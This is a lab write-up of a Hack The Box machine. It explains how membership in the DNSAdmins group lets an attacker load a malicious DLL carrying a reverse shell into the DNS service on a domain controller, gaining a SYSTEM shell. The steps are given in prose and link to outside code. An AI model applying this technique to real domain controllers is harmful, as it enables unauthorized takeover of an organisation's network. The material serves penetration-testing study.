ACTIVE DIRECTORY — PRIVILEGE ESCALATION
Escalating Privileges with DNSAdmins Group
Malicious DLL Injection on a Active Directory Domain Controller
Recently, I learned a privilege escalation technique that involves abusing DNS service on a domain controller. The technique abuses the privileges given by default to the members of the DNS Admins group.
🎯 The attack vector consists of injecting a malicious DLL into the DNS process running as a System to escalate when the service restarts.
For the attack to work, you should have compromised an account that is a member of the DNS Admins group or has the write privileges to a DNS server object.
For this lab, we will abuse the first scenario. I’ll demonstrate the steps of the DLL injection on the Resolute machine from Hack The Box.
$_Attack_Outline
🎯 Goal: Escalating to domain Admin
🛠️ What do we have
- A user account; member of DNSAdmins Group
🔥 HOW : DLL Injection of DNS Plugin
🛠️$_Escalation_Demo
I have already got a foothold on the Resolute machine and obtained access to Ryan’s account, a member of the DNS admins group.
The next step is building the malicious DLL that will grant us the system shell. There are two ways to get this done either generating a DLL through Msfvenom or compiling the DLL from scratch on a windows machine.
I learned from the IppSec video that the problem with generating the DLL with Msfvenom is that it crashes the DNS service after it restarts; that’s because the reverse shell created with Msfvenom does not fork as a separate process for the elevated shell.
That’s not a good thing during a pentest !!
To get around this, we can add a function in the DLL that starts an elevated shell in a new thread and keeps the DNS service running.
I am no expert in C++ 😏 , so I followed the steps provided excellently by ired. team and Ippsec.
💉$_Injection_Time
1- Download and extract the DNS-Exe Persistance code from GitHub. It is a barebone code for a DNS DLL plugin.
We will need to modify the code in a Windows machine to include our reverse shell.
2- In the extracted folder, open the sln file with Visual Studio.
🚦 An SLN file is a structure file used for organizing projects in Microsoft Visual Studio. It contains text-based information about the project environment and project state. — fileinfo
3- In the “Source File” directory, we will add a new file for the shell code by right-clicking on the directory and selecting Add, then New Item as C++ file — we will call the file — reversehell.cpp
The C++ reverse shell sample is from tudorthe1ntruder repo in GitHub - https://github.com/dev-frog/C-Reverse-Shell/blob/master/reverse.c
4- Modify the IP address and port number with the attacking machine IP and the port number. (whatever number you’re listening on with netcat)
Remove the int main function to a regular function, since it is not the program’s starter point anymore.
We will call our function Reverseshell.
5- Next, create a header file, right-click on “Headers” directory, and select Add >> New Item — reverseshell.h
6- In the “Main.cpp” file, the DnsPluginInitialize function creates a new thread and passes the Reverseshell function.
📞When the DnsPluginInitialize is called by the DNS service, it will load the shell function that will create a new process for the elevated shell, while keeping the DNS service running.
7- Change Debug to Release, and choose the architecture of the target machine; in our case, it is x64.
Compile the DLL code, and hope it builds correctly 😅.
8- Great, we have the DLL ready to use. Transfer the file to the attacking machine. We will load the DLL remotely via the UNC path.
Setup an SMB file sharing in the attacking machine
9- In the domain controller, run the dnscmd command below to load the malicious DLL (DNSPriv.dll) from our attacking machine
📍 dnscmd is a windows utility that allows DNS Admins to manage the DNS server.
10. After it runs successfully. Stop the DNS service and restart it again to trigger the DnsPluginInitialize function.
11- As we see, after the restart, dnscmd loaded our DLL, and we got the elevated shell as System 😈
The Resolute box was one of my favorite machines in the Active Directory track. I learned more about this technique, and tinkered around with the C++ code for building the exploit.
All of the modified code and the used commands can be found at R3d-Buck3T — Notion.
That’s all for today. Thanks a lot for reading.
